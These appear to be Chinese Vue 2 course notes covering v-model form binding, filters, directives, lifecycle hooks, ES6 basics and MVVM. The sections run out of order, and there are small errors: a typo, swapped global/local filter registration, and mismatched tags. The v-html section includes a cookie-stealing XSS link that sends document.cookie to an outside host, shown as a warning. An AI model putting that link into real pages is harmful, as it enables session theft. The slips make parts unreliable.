    updateFirstFriendName() {
    this.student.friends[0].name = '张三'
    },
    addHobby() {
    this.student.hobby.push('打台球')
    },
    updateHobby() {
    this.$set(this.student.hobby, 0, '开车')
    },
    removeSmoke() {
    this.student.hobby = this.student.hobby.filter((h)=>{
    return h !== '抽烟'
    })
    }
    }
    })
    </script>

    十三、收集表单数据

    038 收集表单数据

    收集表单数据:
    若:<tnput type="text"/>,则 v-model 收集的是 value 值,用户输入的就是 value 值。
    若:<input type="radio"/>,则 v-model 收集的是 value 值,且要给标签配置 value 值。
    若:<input type="checkbox"/>

    1. 没有配置 inputvalue 属性,那么收集的就是 checked(勾选 or 未勾选,是布尔值)
    2. 配置 inputvalue 属性:
      • v-model 的初始值是非数组,那么收集的就是 checked(勾选 or 未勾选,是布尔值)
      • v-model 的初始值是数组,那么收集的的就是 value 组成的数组

    备注:v-model 的三个修饰符:

    • lazy:失去焦点再收集数据
    • number:输入字符串转为有效的数字
    • trim:输入首尾空格过滤

    ​代码:

    <div id="root">
    <form @submit="demo">
    <label for="account">账号:</label><input type="text" id="account" v-model.trim="account"><br><br>
    <label for="password">密码:</label><input type="password" id="password" v-model="password"><br><br>
    <label for="number">年龄:</label><input type="number" id="age" v-model.number="age"><br><br>
    性别:
    <input type="radio" name="sex" v-model="sex" value="male">
    <input type="radio" name="sex" v-model="sex" value="female"><br><br>
    爱好:
    学习<input type="checkbox" v-model="hobby" value="study">
    打游戏<input type="checkbox" v-model="hobby" value="play">
    吃饭<input type="checkbox" v-model="hobby" value="eat"><br><br>
    所属校区
    <select v-model="city">
    <option value="">请选择校区</option>
    <option value="beijing">北京</option>
    <option value="shanghai">上海</option>
    <option value="shenzhen">深圳</option>
    <option value="wuhan">武汉</option>
    </select><br><br>
    其他信息:
    <textarea v-model.lazy="others"></textarea><br><br>
    <input type="checkbox" v-model="agree">阅读并接受<a href="www.baidu.com">《用户协议》</a><br><br>
    <button type="submit">提交</button>
    </form>

    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。
    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    account: '',
    password: '',
    age: '',
    sex: 'male',
    hobby: [],
    city: 'wuhan',
    others: '',
    agree: ''
    },
    methods: {
    demo() {
    alert("提交数据" + JSON.stringify(this._data))
    }
    }
    })
    </script>

    ​使用 <form> 语句建立一个表单,@submit="demo" 表示提交这个表单时将执行 demo() 函数。

    名称实现备注
    账号<label for="account">账号:</label><input type="text" id="account" v-model.trim="account"><label> 下的 for 将绑定下面的 <input>,使得点击提示文本也会让输入框高亮;
    .trim 表示移除首尾的空格。
    密码<label for="password">密码:</label><input type="password" id="password" v-model="password">type="password" 表示以密码的形式接受输入。
    年龄<label for="number">年龄:</label><input type="number" id="age" v-model.number="age">type="number" 表示接受数字作为输入;
    v-model.number="age" 表示接受的输入将转义成数字(而不是字符串)。
    性别男<input type="radio" name="sex" v-model="sex" value="male">
    女<input type="radio" name="sex" v-model="sex" value="female">
    name="sex" 可以实现单选的选择框;
    value="male"value="female" 可以控制选择选择框时提交的值。
    爱好学习<input type="checkbox" v-model="hobby" value="study">
    打游戏<input type="checkbox" v-model="hobby" value="play">
    吃饭<input type="checkbox" v-model="hobby" value="eat">
    v._data.hobby 初始化时应设成数组,这样才可以多选。
    所属校区<select v-model="city">
    <option value="">请选择校区</option>
    <option value="beijing">北京</option>
    <option value="shanghai">上海</option>
    <option value="shenzhen">深圳</option>
    <option value="wuhan">武汉</option>
    </select>
    选中某个值时会替换。
    其他校区<textarea v-model.lazy="others"></textarea><br/><br/>v-model.lazy 当注意点切换时,Vue 才会更新里面的值,从而提升性能。
    阅读并接受<input type="checkbox" v-model="agree">阅读并接受<a href="www.baidu.com">《用户协议》</a>默认的 type="checkbox",选中返回 true,没选中返回 false
    提交<button type="submit">提交</button>type="submit" 可加可不加,因为 <form> 默认第一个 <button> 按下后将会提交表单。

    webp

    十四、过滤器

    039 过滤器

    过滤器:

    定义:对要显示的数据进行特定格式化后再显示(适用于一些简单逻辑的处理,复杂的还是 computedmethods

    语法:

    1. 注册过滤器:Vue.filter(name,callback)(局部) 或 new Vue{filters:{}}(全局)
    2. 使用过滤器:{{xxx |过滤器名}}v-bind:属性 ="xxx | 过滤器名”

    备注:

    1. 过滤器也可以接收额外参数、多个过滤器也可以串联
    2. 并没有改变原本的数据,是产生新的对应的数据

    ​从 BootCDN - Bootstrap 中文网开源项目免费 CDN 加速服务 铂特优选 处可以找到常用的 js 库。这里整一个 day.min.js

    ​操作一下:

    <div id="root">
    <h2>显示格式化后的时间</h2>
    <!-- 计算属性实现 -->
    <h3>现在是:{{fmtTime}}</h3>
    <!-- methods 实现 -->
    <h3>现在是:{{getFmtTime()}}</h3>
    <!-- 过滤器实现 -->
    <h3>现在是:{{time | timeFormater}}</h3>
    <!-- 过滤器实现(传参) -->
    <h3>现在是:{{time | timeFormater('YYYY-MM-DD') | mySlice}}</h3>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。
    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    time: 1731817795096
    },
    computed: {
    fmtTime() {
    return dayjs(this.time).format('YYYY-MM-DD HH:mm:ss')
    }
    },
    methods: {
    getFmtTime() {
    return dayjs(this.time).format('YYYY-MM-DD HH:mm:ss')
    }
    },
    filters: {
    timeFormater(value, format='YYYY-MM-DD HH:mm:ss') {
    return dayjs(value).format(format)
    },
    mySlice(value) {
    return value.slice(0, 4)
    }
    }
    })
    </script>

    十五、内置指令

    040 v-text 指令

    ​下面的代码与将在 <div> 之间生成文本,但是不会渲染结构。

    <div id="root">
    <div v-text="name"></div>
    <div>{{name}}</div>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。
    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    name: '<h2>古尔丹<h2>'
    }
    })
    </script>

    041 v-html 指令

    v-html 指令:

    1. 作用:向指定节点中消染包含 html 结构的内容。
    2. 与插值语法的区别:
      • v-html 会替换掉节点中所有的内容,{{xx}}v-text 则不会。
      • v-html 可以识别 html 结构。
    3. 严重注意:v-html 有安全性问题!
      • 在网站上动态渲染任意 HTML 是非常危险的,容易导致 XSS 攻击
      • 一定要在可信的内容上使用 v-html永不要用在用户提交的内容上

    ​下面的代码与将在 <div> 之间生成文本,但是渲染结构。

    <div id="root">
    <div v-html="name"></div>
    <div>{{name}}</div>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。
    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    name: '<a href=javascript:location.href="http://www.baidu.com?" + document.cookie>点开有惊喜!<a/>'
    }
    })
    </script>

    ​这段代码是危险的,这可能把该网站的 cookie 送给另一个网站中,如果网站的 cookie 中的关键信息没有使用 HttpOnly,可能导致信息泄露!

    webp

    webp

    ​服务器根据 cookie 决定用户是否登录。同样的 cookie 可以登录同样的账户。

    042 v-cloak 指令

    v-cloak 指令(没有值):

    1. 本质是一个特殊属性,Vue 实例创建完毕并接管容器后,会删掉 v-cloak 属性。
    2. 使用 css 配合 v-cloak 可以解决网速慢时页面展示出 {{xxx}} 的问题。
    [v-cloak] {
    display: none;
    }

    043 v-once 指令

    v-once 指令:

    1. v-once 所在节点在初次动态渲染后,就视为静态内容了。
    2. 以后数据的改变不会引起 v-once 所在结构的更新,可以用于优化性能。

    044 v-pre 指令

    v-pre 指令:

    1. 跳过其所在节点的编译过程。
    2. 可利用它跳过:没有使用指令语法、没有使用插值语法的节点,会加快编译。

    十六、自定义指令

    045 自定义指令-函数式 & 046 自定义指令-对象式

    ​使用 directives 创建一个自定义指令:

    directives 下的函数接收两个参数,分别是绑定的真实 DOM 和绑定中传的参数。

    <div id="root">
    <h2>当前的 n 值是:<span v-text="n"></span></h2>
    <!-- 需求 1:定义一个 v-big 指令,和 v-text 功能类似,但会把绑定的数值扩大 10 倍。 -->
    <h2>放大 10 倍后的 n 值是:<span v-big="n"></span></h2>
    <button @click="n++">点我 n + 1</button>
    <hr>
    <!-- 需求 2:定义一个 v-bind 指令,和 v-bind 功能类似,但可以让其所绑定的 input 元素默认获取焦点。 -->
    <input type="text" v-fbind:value="n">
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。
    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    n: 1
    },
    directives: {
    // big 函数何时会被调用?
    // 1. 指令与元素成功绑定时(一上来)bind()
    // 2. 指令所在的模板被重新解析时 update()
    big(element, binding) {
    element.innerText = binding.value * 10
    console.log(element, binding)
    },
    fbind: {
    // 指令与元素成功绑定时(一上来)
    bind(element, binding) {
    element.value = binding.value
    },
    // 指令所在元素被插入页面时
    inserted(element, binding) {
    element.focus()
    },
    // 指令所在的模板被重新解析时
    update(element, binding) {
    element.value = binding.value
    }
    }
    }
    })
    </script>

    047 自定义指令-总结

    自定义指令总结:

    1. 定义语法
      • 局部指令:
        • new Vue({directives: {指令名: 配置对象}})
        • new Vue({directives{指令名: 回调函数}})
      • 全局指令:
        • Vue.directive(指令名, 配置对象)
        • Vue.directive(指令名, 回调函数)
    2. 配置对象中常用的 3 个回调:
      • bind:指令与元素成功绑定时调用。
      • inserted:指令所在元素被插入页面时调用。
      • update:指令所在模板结构被重新解析时调用。
    3. 备注:
      • 指令定义时不加 v-,但使用时要加 v-
      • 指令名如果是多个单词,要使用 kebab-case 命名方式,不要用 camelCase 命名。

    十七、生命周期

    049 生命周期-挂载流程

    生命周期:

    1. 又名:生命周期回调函数、生命周期函数、生命周期钩子。
    2. 是什么:Vue 在关键时刻帮我们调用的一些特殊名称的函数。
    3. 生命周期函数的名字不可更改,但函数的具体内容是程序员根据需求编写的。
    4. 生命周期函数中的 this 指向是 vm 或组件实例对象。
    <div id="root">
    <!-- 完整写法:<h2 :style="{opacity: opacity}">欢迎学习 Vue</h2> -->
    <h2 :style="{opacity}">欢迎学习 Vue</h2>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。
    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    opacity: 0.75
    },
    // Vue 完成模板的解析并把真实的 DOM 元素放入页面后(挂载完毕)调用 mounted()
    mounted() {
    console.log('mounted', this)
    setInterval(() => {
    this.opacity -= 0.01
    if (this.opacity <= 0)
    this.opacity = 1
    }, 16)
    },
    })
    </script>

    050 生命周期-更新流程 & 051 生命周期-销毁流程

    ​Vue 组件的生命周期大致可以分为三个阶段:创建阶段更新阶段销毁阶段。每个阶段都有一系列的生命周期钩子函数,可以让开发者在这些阶段执行特定的逻辑。

    webp

    052 总结生命周期

    张三的一生(张三的生命周期):

    • 将要出生
    • (重要)呱呱坠地 → 检查身体各项指标。
    • 学会说话
    • 学会走路
    • ……
    • ……
    • (重要)将要永别 → 交代后事
    • 已经永别

    vm 的一生(vm 的生命周期):

    • 将要创建 → 调用 beforecreate()
    • 创建完毕 → 调用 created()
    • 将要挂载 → 调用 beforeMount()
    • (重要)挂载完毕 → 调用 mounted()
    • 将要更新 → 调用 beforeUpdate()
    • 更新完毕 → 调用 updated()
    • (重要)将要销毁 → 调用 beforeDestroy()
    • 销毁完毕 → 调用 destroyed()

    常用的生命周期钩子:

    1. mounted():发送 ajax 请求、启动定时器、绑定自定义事件、订阅消息等【初始化操作】。
    2. beforeDestroy():清除定时器、解绑自定义事件、取消订阅消息等【收尾工作】。

    关于销毁 Vue 实例

    1. 销毁后借助 Vue 开发者工具看不到任何信息。
    2. 销毁后自定义事件会失效,但原生 DOM 事件依然有效。
    3. 一般不会再 beforeDestroy() 操作数据,因为即便操作数据,也不会再触发更新流程了。
    <div id="root">
    <!-- 完整写法:<h2 :style="{opacity: opacity}">欢迎学习 Vue</h2> -->
    <h2 :style="{opacity}">欢迎学习 Vue</h2>
    <button @click="stop">点我停止变换</button>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。
    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    opacity: 0.75
    },
    methods: {
    stop() {
    this.$destroy()
    }
    },
    // Vue 完成模板的解析并把真实的 DOM 元素放入页面后(挂载完毕)调用 mounted()
    mounted() {
    console.log('mounted', this)
    this.timer = setInterval(() => {
    this.opacity -= 0.01
    if (this.opacity <= 0)
    this.opacity = 1
    }, 16)
    },
    beforeDestroy() {
    clearInterval(this.timer) // 销毁 Vue 实例并不会销毁定时器
    },
    })
    </script>
    ]]>
    + 资源

    目录

    1. Vue 核心
    2. Vue 组件化编程
    3. 使用 Vue 脚手架
    4. Vue 中的 ajax
    5. vuex
    6. vue-router
    7. Vue UI 组件库

    正文

    一、初识 Vue

    001 课程简介

    Vue2(4 年、70+ 更新)→Vue3(未来趋势)

    Vue:

    • vue 基础
    • vue-cli
    • vue-router
    • vuex
    • element-ui
    • vue3

    002 Vue 简介

    Vue 是什么?

    一套用于构建用户界面渐进式 Javascript 框架。

    构建用户界面:将后端的数据转换为界面(DOM)显示

    **渐进式:**Vue 可以自底向上逐层的应用

    • 简单应用:只需一个轻量小巧的核心库
    • 复杂应用:可以引入各式各样的 Vue 插件

    谁开发的?

    ​尤雨溪:yyx990803 (Evan You)

    年份描述
    2013 年受到 Angular 框架的启发,尤雨溪开发出了一款轻量框架 - Seed。
    同年 12 月,Seed 更名为 Vue,版本号 0.6.0。
    2014 年Vue 正式对外发布,版本号0.8.0
    Taylor otwel 在 Twitter 上发表动态,说自己正在学习 Vue.js
    2015 年10 月 27 日,正式发布 Vue 1.0.0 Evangelion(新世纪福音战士)
    2016 年10 月 1 日,正式发布 Vue 2.0.0 Ghostin the Shell(攻壳机动队)
    2020 年9 月 18 日,正式发布 Vue 3.0.0 One Piece(海贼王)

    ​后起之秀,生态完善,已然成为国内前端工程师必备技能。

    Vue 的特点

    • 采用组件化模式,提高代码复用率、且让代码更好维护。

    webp

    ​像网页中的各个组件的 DOM,用对应的 vue 文件来表示,vue 中集成了 Html、CSS、JS 中的内容。各个组件不会互相影响。

    数据(persons)

    1
    2
    3
    4
    5
    [
    {id: '001',name: '张三',age: 18},
    {id:'002',name:'李四',age:19},
    {id:'003',name:'王五',age:20}
    ]

    容器(DOM)

    1
    <ul id="list"></ul>

    效果

    • 001 - 张三 - 18
    • 002 - 李四 - 19
    • 003 - 王五 - 20
    • 声明式编码,让编码人员无需直接操作 DOM,提高开发效率。

    命令式编码

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    // 准备 html 字符串
    let htmlStr ='
    // 遍历数据拼接 htm1 字符串
    persons.forEach(p=>{
    htmlstr +=`<li>${p.id}-${p.name}-${p.age}</li>`
    });
    // 获取 list 元素
    let list = document.getElementById('list')
    // 修改内容(亲自操作 DOM)
    list.innerHTML = htmlstr

    声明式编码

    1
    2
    3
    4
    5
    <ul id="list">
    <li v-for="p in persons">
    {{p.id}}-{{p.name}}-{{p.age}}
    </li>
    </ul>
    • 使用虚拟 DOM+优秀的 Diff 算法,尽量复用 DOM 节点。

    原生 Javascript 实现将数据转换为视图:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    <!-- 展示人员列表的容器 -->
    <ul id="list"></ul>

    <script type="text/javascript">
    // 一些人的数据
    let persons = [
    {id:'001', name:'张三', age:18},
    {id:'002', name:'李四', age:19},
    {id:'03', name:'王五', age:20}
    ]

    // 准备 html 字符串
    let htmlStr = ''

    // 遍历数据拼接 html 字符串
    persons.forEach(p =>{
    htmlstr +=`<li>${p.id}-${p.name}-${p.age}</li>`
    });

    //获取 list 元素
    let list = document.getElementById('list')

    //修改内容(亲自操作 DOM)
    list.innerHTML = htmlstr
    </script>

    得到:

    • 001 - 张三 - 18
    • 002 - 李四 - 19
    • 003 - 王五 - 20

    webp

    ​原生 JavaScript 直接将数据转化到页面真实 DOM(Real-DOM)。如果数据有更新,需要重新渲染整个 DOM。

    webp

    ​Vue 引入了虚拟 DOM(Virtual-DOM)的概念。

    ​在 Vue 中,Diff(全称:差异算法)是指在更新视图时,Vue 通过对比新旧虚拟 DOM(Virtual DOM)树,计算出最小的变化差异,并通过这些差异来更新真实的 DOM。

    1. 虚拟DOM的概念

    ​虚拟 DOM(Virtual DOM)是 Vue 用来提高性能的一种技术。它通过在内存中创建一棵与实际 DOM 结构相对应的虚拟 DOM 树,然后在数据变化时,只对比新旧虚拟 DOM 的差异,最终只将最小的差异更新到真实的 DOM 中,而不是每次数据变化时都重新渲染整个 DOM。

    2. Diff 算法的过程

    ​当组件的状态或数据发生变化时,Vue 会生成新的虚拟 DOM,并与旧的虚拟DOM 进行对比。这个对比的过程就是 Diff 算法的核心。Diff 算法的主要目标是通过高效的方式找出新旧虚拟 DOM 树的差异,并最小化 DOM 更新的开销。

    ​具体的 Diff 步骤可以分为以下几个关键过程:

    • 节点类型比较:Vue 会首先判断新旧节点是否是同一个类型。如果是同类型节点,继续对子节点进行比较;如果不是同类型节点,直接替换整个节点。
    • 属性比较:对于同类型的节点,Vue 会逐一比较它们的属性(如 classstyle 等)。只有当属性发生变化时,Vue 才会更新这些属性。
    • 子节点比较:Vue 使用一些优化策略来比较子节点。比如它会在相同的父节点下,使用一个双指针的方式(前后两个指针分别指向新旧子节点),通过遍历来找出差异,避免不必要的遍历。
    • Key 的使用:Vue 建议在列表渲染时为每个子元素添加一个 key,这样可以帮助 Vue 更高效地定位元素,减少不必要的重排和重绘。

    3. Diff 算法的优化

    Vue 中的 Diff 算法是经过优化的,主要通过以下几点提高性能:

    • 最小化比较范围:在树的同一层级内,Vue 通过双指针的方式来比较子节点,而不是完全重新遍历所有子节点。
    • 跳过不必要的更新:如果新旧节点内容完全相同,Vue 会跳过这个节点的更新。
    • 分层更新:Vue 会优先更新那些改变了的节点,而不需要重新渲染整个树。

    4. 为什么需要 Diff 算法

    ​DOM 操作通常是非常耗费性能的,尤其是在数据频繁变化的场景中。Vue 通过使用虚拟 DOM 和 Diff 算法,能够显著减少不必要的 DOM 操作,从而提升性能。

    学习 Vue 之前要掌握的 JavaScript 基础知识?

    ES6 语法规范

    ​ES6(ECMAScript 2015)是 JavaScript 的一个重要更新版本,它带来了许多新的语法特性,能使代码更加简洁和高效。主要包括:

    • let 和 constlet 用于声明可变的变量,const 用于声明常量。
    • 箭头函数:简化函数书写,并且箭头函数的 this 绑定是词法作用域,而非动态绑定。
    1
    const add = (a, b) => a + b;
    • 模板字符串:允许使用 ${} 插入变量,使字符串拼接更加直观。
    1
    2
    let name = "Vue";
    console.log(`Welcome to ${name}`);
    • 解构赋值:可以快速从数组或对象中提取值,并赋予变量。
    1
    2
    const [a, b] = [1, 2]; // 解构数组
    const { name, age } = { name: "Alice", age: 25 }; // 解构对象
    • 默认参数:函数参数可以设置默认值。
    1
    2
    3
    function greet(name = "Guest") {
    console.log(`Hello, ${name}!`);
    }
    • 扩展运算符(spread/rest):简化数组和对象的操作。
    1
    2
    3
    4
    5
    let arr = [1, 2, 3];
    let newArr = [...arr, 4, 5]; // 扩展数组

    const obj = { a: 1, b: 2 };
    const newObj = { ...obj, c: 3 }; // 扩展对象
    ES6 模块化

    ​ES6 引入了模块化机制,通过 importexport 使得代码更易维护和重用。模块化的关键:

    • 导出:模块中可以通过 export 导出变量、函数或类。
    1
    2
    3
    4
    5
    // person.js
    export const name = 'Alice';
    export function greet() {
    console.log("Hello!");
    }
    • 导入:其他模块通过 import 来使用导出的内容。
    1
    2
    3
    4
    // app.js
    import { name, greet } from './person.js';
    greet();
    console.log(name);
    包管理器

    ​在现代 JavaScript 开发中,包管理器(如 npmyarn)用于管理项目中的依赖包,安装、更新、卸载模块。

    • npm(Node Package Manager):是 Node.js 默认的包管理器,帮助开发者下载并管理第三方库和工具。
    1
    2
    3
    npm init -y      # 初始化一个新的 package.json 文件
    npm install vue # 安装 Vue.js 库
    npm install # 安装项目中的所有依赖
    • yarn:是 Facebook 推出的包管理工具,相比 npm 在性能和并发性上有些优化。
    1
    2
    3
    yarn init         # 初始化项目
    yarn add vue # 安装 Vue.js 库
    yarn install # 安装项目依赖
    原型与原型链

    ​JavaScript 是基于原型的语言,每个对象都有一个 prototype 属性,指向其原型对象。原型链是通过对象的 prototype 属性连接起来的链式结构。通过原型链可以实现继承。

    • 原型:每个函数都有一个 prototype 属性,用于定义该函数创建的对象的共享属性和方法。
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    function Person(name) {
    this.name = name;
    }

    Person.prototype.sayHello = function() {
    console.log("Hello, " + this.name);
    };

    const person = new Person('John');
    person.sayHello(); // Hello, John
    • 原型链:对象通过 __proto__ 访问原型,从而实现继承。
    1
    2
    const obj = { name: 'Vue' };
    console.log(obj.__proto__); // 访问 obj 的原型对象
    数组常用方法

    ​在日常开发中,JavaScript 数组的方法非常重要。以下是一些常用的数组方法:

    • map():返回一个新数组,数组中的每个元素都经过回调函数处理。
    1
    2
    const arr = [1, 2, 3];
    const result = arr.map(x => x * 2); // [2, 4, 6]
    • filter():返回一个新数组,包含所有通过条件测试的元素。
    1
    2
    const arr = [1, 2, 3, 4];
    const result = arr.filter(x => x > 2); // [3, 4]
    • reduce():通过回调函数将数组值汇总为单一的值。
    1
    2
    const arr = [1, 2, 3];
    const sum = arr.reduce((acc, curr) => acc + curr, 0); // 6
    • forEach():对数组的每个元素执行一个回调函数,不返回新数组。
    1
    2
    const arr = [1, 2, 3];
    arr.forEach(x => console.log(x)); // 输出 1, 2, 3
    Axios

    Axios 是一个基于 Promise 的 HTTP 客户端,用于浏览器和 Node.js。它常用于向后端 API 发起请求。

    • 发送 GET 请求
    1
    2
    3
    4
    5
    6
    7
    axios.get('https://api.example.com/data')
    .then(response => {
    console.log(response.data);
    })
    .catch(error => {
    console.error(error);
    });
    • 发送 POST 请求
    1
    2
    3
    4
    5
    6
    7
    axios.post('https://api.example.com/data', { name: 'Vue' })
    .then(response => {
    console.log(response.data);
    })
    .catch(error => {
    console.error(error);
    });
    Promise

    Promise 是 JavaScript 中用于处理异步操作的对象,它有三种状态:pending(等待中)、resolved(已完成)、rejected(已拒绝)。

    • 创建 Promise
    1
    2
    3
    4
    5
    6
    7
    8
    const promise = new Promise((resolve, reject) => {
    let success = true;
    if (success) {
    resolve('Success!');
    } else {
    reject('Failed!');
    }
    });
    • 使用 .then().catch()
    1
    2
    3
    promise
    .then(result => console.log(result)) // Success!
    .catch(error => console.log(error)); // Failed!
    • 链式调用
    1
    2
    3
    4
    5
    6
    new Promise((resolve, reject) => {
    resolve(1);
    })
    .then(value => value + 2)
    .then(value => value * 3)
    .then(value => console.log(value)); // 9

    003 Vue 官网使用指南

    004 搭建 Vue 开发环境

    ​从 安装 — Vue.js 获取 Vue2 的代码,得到文件:vue.js(开发版本,包含完整的警告和调试模式) 和 vue.min.js(上线时使用,删除了所有警告信息,体积更小)。

    webp

    ​将下载好的文件导入到项目中,如此组织项目中的文件。

    ​在 VSCode 下的空白 html 文件中,输入 ! 后再按 Tab 键即可快速生成模板,此后修改文件内容:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    <!DOCTYPE html>
    <html lang="en">
    <head>
    <meta charset="UTF-8">
    <title>Document</title>
    <!-- 引入 Vue -->
    <script type="text/javascript" src="../js/vue.js"></script>
    </head>
    <body>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。
    </script>
    </body>
    </html>

    ​安装 Vue DevTools 便于开发者调试:Vue.js devtools - Microsoft Edge Addons

    ​此时 Vue 开发环境搭建完成。

    005-006 Hello 小案例 & 分析

    ​在 VSCode 中,输入 div#root 可以快速生成 <div id="root"></div>


    初识 Vue:

    1. 想让 Vue 工作,就必须创建一个 Vue 实例,且要传入一个配置对象;

    2. root 容器里的代码依然符合 html 规范,只不过混入了一些特殊的 Vue 语法;

    3. root 容器里的代码被称为 Vue 模板

    4. Vue 实例和容器是一一对应的;

    5. 真实开发中只有一个 Vue 实例,并且会配合着组件一起使用;

    6. {{}} 中的内容要写 js 表达式,且内容可以自动读取到 data 中的所有属性;

      注意区分 js 表达式和 js 代码(语句)

      • 表达式:一个表达式会产生一个值,可以放在任何一个需要值的地方:
        • a
        • a + b
        • demo(1)
        • x === y ? 'a' : 'b'
      • js 代码(语句)
        • if(){}
        • for(){}
    7. 一旦 data 中的数据发生改变,那么模板中用到该数据的地方也会自动更新

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    <div id="root">
    <h1>Hello, {{name.toUpperCase()}}</h1>
    <h1>I'm {{age}} years old.</h1>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。

    // 创建 Vue 实例
    new Vue({
    el: "#root", // el 用于指定当前 Vue 实例为哪个容器服务,值通常为 css 选择器字符串(类/id)。
    data: {
    name: 'Gul’dan',
    age: '18'
    }
    })
    </script>

    二、Vue 模板语法

    007 模板语法

    ​Vue 模板语法有两大类:

    1. 插值语法
      • 功能:用于解析标签体内容
      • 写法:{{xxx}},xxx 是 js 表达式,且可以直接读取到 data 中的所有属性。
    2. 指令语法
      • 功能:用于解析标签(包括:标签属性、标签体内容、绑定事件……)
      • 举例:v-bind:href="xxx" 或简写为 :href="xxx",xxx 同样要写 js 表达式,且可以直接读取到 data 中的所有属性。
      • 备注:Vue 中有很多的指令,且形式都是:v-????,此处我们只是拿 v-bind 举个例子。
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    <div id="root">
    <h1>Hello, {{player.name}}</h1>
    <a :href="url">点击打开百度!</h1>
    <a v-bind:href="url">点击打开百度!</h1>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。

    // 创建 Vue 实例
    new Vue({
    el: '#root',
    data: {
    player:{
    name: 'Gul’dan'
    },
    url: 'http://www.baidu.com'
    }
    })
    </script>

    三、数据绑定

    008 数据绑定

    Vue 中有两种数据绑定的方式:

    1. 单向绑定 v-bind:数据只能从 data 流向页面。

    2. 双向绑定 v-model:数据不仅能从 data 流向页面,还可以从页面流向 data。

      备注:

      • 双向绑定一般都**应用在表单类元素(输入类元素)**上(如:inputselect 等)
      • v-model:value 可以简写为 v-model,因为 v-model 默认收集的就是 value 值。
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    <div id="root">
    单向数据绑定:<input type="text" :value="name"><br/>
    双向数据绑定:<input type="text" v-model:value="name"><br/>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。

    // 创建 Vue 实例
    new Vue({
    el: '#root',
    data: {
    name: '123456'
    }
    })
    </script>

    webp

    ​修改上面输入框的值不会更改 Vue 实例中的 data;

    ​修改下面输入框的值会更改 Vue 实例中的 data,进而影响上面输入框的值。

    四、el 与 data 的两种写法

    009 el 与 data 的两种写法

    1. el 的两种写法

      • new Vue 时配置 el 属性。

      • 先创建 Vue 实例,随后再通过 vm.$mount('#root') 指定 el 的值。

    2. data 有两种写法

      • 对象式
      • 函数式

      如何选择:目前哪种写法都可以,以后学习到组件时,data 必须使用函数式,否则会报错。

      一个重要的原则:由 Vue 管理的函数,一定不要写箭头函数,一旦写了箭头函数,this 就不再是 Vue 实例了(而是 window)。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    <div id="root">
    <h1>你好,{{name}}</h1>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。

    // 创建 Vue 实例
    const v = new Vue({
    data() {
    return {name: '古尔丹'}
    }
    })

    setTimeout(() => {
    v.$mount('#root')
    }, 1000)
    </script>

    五、MVVM 模型

    010 理解 MVVM

    ​在软件开发中,MVVM(Model-View-ViewModel) 是一种软件架构模式,广泛应用于前端开发,尤其是在以数据驱动的用户界面(UI)中,比如 WPF、Xamarin 和前端框架(如 Vue、Angular 等)。它通过将用户界面逻辑和业务逻辑进行分离,简化了应用的状态管理和数据绑定。MVVM 模式包含三个主要组件:

    1. Model(模型)
      Model 是应用程序的数据层,通常包含业务逻辑和数据结构。它负责从数据源(如数据库、API 等)获取数据,并提供相关的业务逻辑处理。
    2. View(视图)
      View 是用户界面层,负责显示数据和接收用户的交互。View 通常包含界面布局和样式文件,如 HTML 或 XAML。它的职责是呈现数据,但不负责逻辑处理。
    3. ViewModel(视图模型)
      ViewModel 充当 View 和 Model 之间的桥梁。它包含 UI 所需的数据和状态,监听用户的输入并更新 Model,同时将 Model 的数据转换成 View 可使用的形式。View 和 ViewModel 之间一般通过数据绑定来实现通信。

    MVVM 的关键特点

    • 双向数据绑定
      在 MVVM 中,View 和 ViewModel 之间的数据绑定是双向的:View 绑定到 ViewModel 的属性,ViewModel 的属性值改变时,View 会自动更新;反之,用户在 View 中的输入会更新 ViewModel 中的属性。这种双向绑定极大地减少了手动更新 UI 的需求。
    • 命令模式
      ViewModel 提供命令(Commands),由 View 绑定,用于处理用户的操作(如点击按钮)。通过命令,ViewModel 可以与业务逻辑进行交互,而无需让 View 直接处理事件。
    • 可测试性
      MVVM 模式使得 ViewModel 可以与 UI 分离,便于单元测试。因为 ViewModel 不直接依赖 View,可以在不使用 UI 的情况下进行逻辑测试。

    webp

    1. M:模型 (Model):对应 data 中的数据
    2. V:视图 (View):模板
    3. VM:视图模型 (ViewModel):Vue 实例对象

    webp

    观察发现:

    1. data 中所有的属性,最后都出现在了 vm 身上。
